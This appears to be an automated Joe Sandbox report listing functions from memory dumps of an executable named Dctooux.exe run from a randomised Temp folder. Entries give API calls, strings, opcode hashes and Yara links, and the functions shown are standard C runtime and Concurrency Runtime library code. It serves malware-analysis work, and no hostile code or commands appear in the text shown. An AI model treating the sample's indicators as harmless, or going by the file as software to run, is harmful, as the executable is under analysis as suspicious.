Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b2b3d092f778f7737924a835d755ffb963784a26a5edbdc347cb61d7279d0a44
Instruction ID: 31e1b9a225840668c844fc2279bc3303cb50cd02ad30b8b70b8ea0967ceb45ce
Opcode Fuzzy Hash: b2b3d092f778f7737924a835d755ffb963784a26a5edbdc347cb61d7279d0a44
Instruction Fuzzy Hash: 0801D432A0D7226EF7697BB87D85B6A2654EB11375730033AF524850F5EF528C4367C1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7106B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A71079
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A7107F
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A710AC
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A710B6
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 00A710C8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A710DE

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: 1a483a8818ed7bb0f265db78510464defba0b7c0b2718d9e28c566784f7a5eda
Instruction ID: e7517e80ab759cfe6e763fddf11d60eeff977936dae7daf0ef9ec6809265e408
Opcode Fuzzy Hash: 1a483a8818ed7bb0f265db78510464defba0b7c0b2718d9e28c566784f7a5eda
Instruction Fuzzy Hash: 81018F32600156E7CB14FBAADD09BBB36FCAB41751B20C829F559D2191EB20DD528760

Uniqueness

Uniqueness Score: -1.00%

Function 00A8626A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00A862BD
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00A862D6
PMDtoOffset.LIBCMT ref: 00A862FC

Strings

Bad dynamic_cast!, xrefs: 00A8633E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: f9536f5ad06bbfa022f45273230b255d361925bceddbf9b4bc8d2ee24ab51290
Instruction ID: b45dd27b96e3845b63b9faccbac9e13d856826751d11b3808d35eeb953f094b5
Opcode Fuzzy Hash: f9536f5ad06bbfa022f45273230b255d361925bceddbf9b4bc8d2ee24ab51290
Instruction Fuzzy Hash: 9F210B72E04205AFEF14FF64DE46EEE77B8EB45720B104669F91497181EB31ED108790

Uniqueness

Uniqueness Score: -1.00%

Function 00A82C77 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00A82CD2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A82CF1
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00A82D38

Strings

pContext, xrefs: 00A82CE9

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: a59f275989ac7ab4536dbf6e4ff1263f1f3694463fcb40fddb852d814fc61dfe
Instruction ID: 60394c795d1112bbdf3c70f1bbad61ba7e4908333bb6cedd999fd4ae79f9ae36
Opcode Fuzzy Hash: a59f275989ac7ab4536dbf6e4ff1263f1f3694463fcb40fddb852d814fc61dfe
Instruction Fuzzy Hash: 662145327006169BCB25BB68C895BBCB7E4BFA5324B00042AF412872D2DF74EC56CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8F3C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, xrefs: 00A8F3C8

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
API String ID: 0-3759040850
Opcode ID: b33328d6759183073e97438cc53b402089affbb65056d49002cab005a8fdf0b5
Instruction ID: d0d2f545fe6c5d84ad2efa323c598de190b3162a64ba37ae57c40d3788295f3d
Opcode Fuzzy Hash: b33328d6759183073e97438cc53b402089affbb65056d49002cab005a8fdf0b5
Instruction Fuzzy Hash: BD21A1B160420BAFDB20BF658D80D2B77ADEF453647108636F938D7151EB30EC108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A762F2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00A76351
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A76374
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00A763B6

Strings

count, xrefs: 00A7630A
ppVirtualProcessorRoots, xrefs: 00A7636C

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: 2f06b9f0b4f3c7d38bf94d28e7a4f44b9384dd47c236e57968c897bffc70cb4b
Instruction ID: 3560cced72d32a4a0eb36d938ac13764cd28e9d2115e63cd43ba7d847170c1fe
Opcode Fuzzy Hash: 2f06b9f0b4f3c7d38bf94d28e7a4f44b9384dd47c236e57968c897bffc70cb4b
Instruction Fuzzy Hash: 8F217F35A00615EFCB08EFA9CA91EAD77B5FF49300F008069F51A9B692DB71AE01CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A885E9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00A8862B

Strings

.exe, xrefs: 00A88638
.com, xrefs: 00A8866B
.bat, xrefs: 00A8865A
.cmd, xrefs: 00A88649

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 2e691fe00022746baa074691ca42b57b7819d5ce54894052a0596dea7f4f8d4c
Instruction ID: 86a78634b29e9a81570a2cb753a6d2480a9d695ee870547b8a49c0fde6dc1052
Opcode Fuzzy Hash: 2e691fe00022746baa074691ca42b57b7819d5ce54894052a0596dea7f4f8d4c
Instruction Fuzzy Hash: 4701F937A0871635661431289D02A7B1B9A9FD6FB072A013EF944F71C1FF98DC0243E8

Uniqueness

Uniqueness Score: -1.00%

Function 00A87407 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00A87457

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 0c1d0c2cfb2c91cf7cfa2bf2a453b2a828ecfac3a973842dbdef000b8d0bb11e
Instruction ID: af64f14fcebd53754a1edf7332915ffb5f543c1570e0bd9b7a363e2d5de8aa04
Opcode Fuzzy Hash: 0c1d0c2cfb2c91cf7cfa2bf2a453b2a828ecfac3a973842dbdef000b8d0bb11e
Instruction Fuzzy Hash: 4A11AB31A09225ABDB32AB789C44B5E7F68AF467B0B314520ED16A72E1D730DD01D7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00A834E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 00A83504
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A83515
StructuredWorkStealingQueue.LIBCMT ref: 00A8354B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A8355C

Strings

e, xrefs: 00A83526

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 53c7626022cb4cf998fcc18bf218fc2336787f95bd66817ad3bd551a81bf82c6
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: F61173725001059FDF58FF6DC99166B77B5AF02754B14C169E8069F202DB71EF04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A879BD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00A879B2,?,?,00A8797A,75295780,00000000,?), ref: 00A879D2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A879E5
FreeLibrary.KERNEL32(00000000,?,?,00A879B2,?,?,00A8797A,75295780,00000000,?), ref: 00A87A08

Strings

CorExitProcess, xrefs: 00A879DD
mscoree.dll, xrefs: 00A879CB

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1cc229ee670f0ed864d788bb0ecf70c57fbdd3f47380c4e8337323dcc7295fa6
Instruction ID: dadf3f4a9efe31f6a0f7acd2657227dbf4782a63d0e5a9f4157e870072859bfb
Opcode Fuzzy Hash: 1cc229ee670f0ed864d788bb0ecf70c57fbdd3f47380c4e8337323dcc7295fa6
Instruction Fuzzy Hash: 14F0A73150411AFBDB12EB94DD09BDEBA75FB45755F200050F800A21E0CB70CE11DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A97B89 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00A97C2C
__alloca_probe_16.LIBCMT ref: 00A97CE2
__alloca_probe_16.LIBCMT ref: 00A97D78
__freea.LIBCMT ref: 00A97DE3
__freea.LIBCMT ref: 00A97DEF

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 5e44e905abce3e9f737172ae2abbe927a6746c7dd6f9e702204208a6be678207
Instruction ID: aa7507fe9ba30029cf3c0f83920e0eef38b2ee877c2ae3513d75d7b30887cc7a
Opcode Fuzzy Hash: 5e44e905abce3e9f737172ae2abbe927a6746c7dd6f9e702204208a6be678207
Instruction Fuzzy Hash: 88819072F2821AABDF219F648D81EFE7BF9AF49710F180055E905A7251E635DC40CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A95FF4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00A96078
__alloca_probe_16.LIBCMT ref: 00A9613E
__freea.LIBCMT ref: 00A961AA

Part of subcall function 00A8C42B: RtlAllocateHeap.NTDLL(00000000,00A67EF7,?,?,00A6E851,00A67EF7,?,00A68D7B,8B18EC84,74DF0F00), ref: 00A8C45D

__freea.LIBCMT ref: 00A961B3
__freea.LIBCMT ref: 00A961D6

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 566f81c587a80e0fca0d16e5f848459f4c376399cc057bc28556746c7504821e
Instruction ID: 4959ebd5f9b03f5ee7e48864febf4c8fa091004532ff4613a2eb47a3eedbe2f1
Opcode Fuzzy Hash: 566f81c587a80e0fca0d16e5f848459f4c376399cc057bc28556746c7504821e
Instruction Fuzzy Hash: 8C51C172B00216AFEF21AF649D81EBB37E9DF84760F254229FD0897152EB71DC5096A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A82842 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00A82849
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00A82894
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00A828C7
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00A82977

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: d975041e8bafeed2e2a17395849ed73c92a0412fc09d1248a62187bbcfe5059d
Instruction ID: 26fb00473fea8da566c79573f2a190ccbc412dd0d4f4a3e844a9d9f5ebe9694e
Opcode Fuzzy Hash: d975041e8bafeed2e2a17395849ed73c92a0412fc09d1248a62187bbcfe5059d
Instruction Fuzzy Hash: A2419375A00706AFCF14EF69C9815EDFBB5FF88310B54822EE419A7781DB30A951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A7EF80 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A7EFB4

Part of subcall function 00A7A37F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00A7A3A0

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00A7F013
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00A7F039
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 00A7F059
Concurrency::location::_Assign.LIBCMT ref: 00A7F0A6

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
String ID:
API String ID: 1794448563-0
Opcode ID: aad9d6cc5fd56d381361a31230f8587163b5f926e3b1f88270b350d5f08e7a7b
Instruction ID: e06fc64a0876c2308cd9989cb2b340a0faec7a452b9cd69dfc24678775202c76
Opcode Fuzzy Hash: aad9d6cc5fd56d381361a31230f8587163b5f926e3b1f88270b350d5f08e7a7b
Instruction Fuzzy Hash: D1412771600214AFCF19EB68CC95BBDBB75AF45710F14C0A9E40A9B386DB349E46C791

Uniqueness

Uniqueness Score: -1.00%

Function 00A70136 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00A7013D
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00A70167

Part of subcall function 00A7082D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00A7084A

__alloca_probe_16.LIBCMT ref: 00A701A3
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00A701E4
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00A70216

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
String ID:
API String ID: 2568206803-0
Opcode ID: cc13d2e2f4d55e3ea03732fce1f583c80966462ee66d8ec03e18490b5ca351b6
Instruction ID: 2ee54cc82609916920f3e3c9eba1d1275fdf43ad88ee0ff25a2103328a39abbc
Opcode Fuzzy Hash: cc13d2e2f4d55e3ea03732fce1f583c80966462ee66d8ec03e18490b5ca351b6
Instruction Fuzzy Hash: B9319E72A00216CBCB14DFA8CD41AAEBBF5AF19310F65C169E509E7341DB349E42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A79B19 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 00A79B3E

Part of subcall function 00A6FF20: _SpinWait.LIBCONCRT ref: 00A6FF38

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00A79B52
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A79B84
List.LIBCMT ref: 00A79C07
List.LIBCMT ref: 00A79C16

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
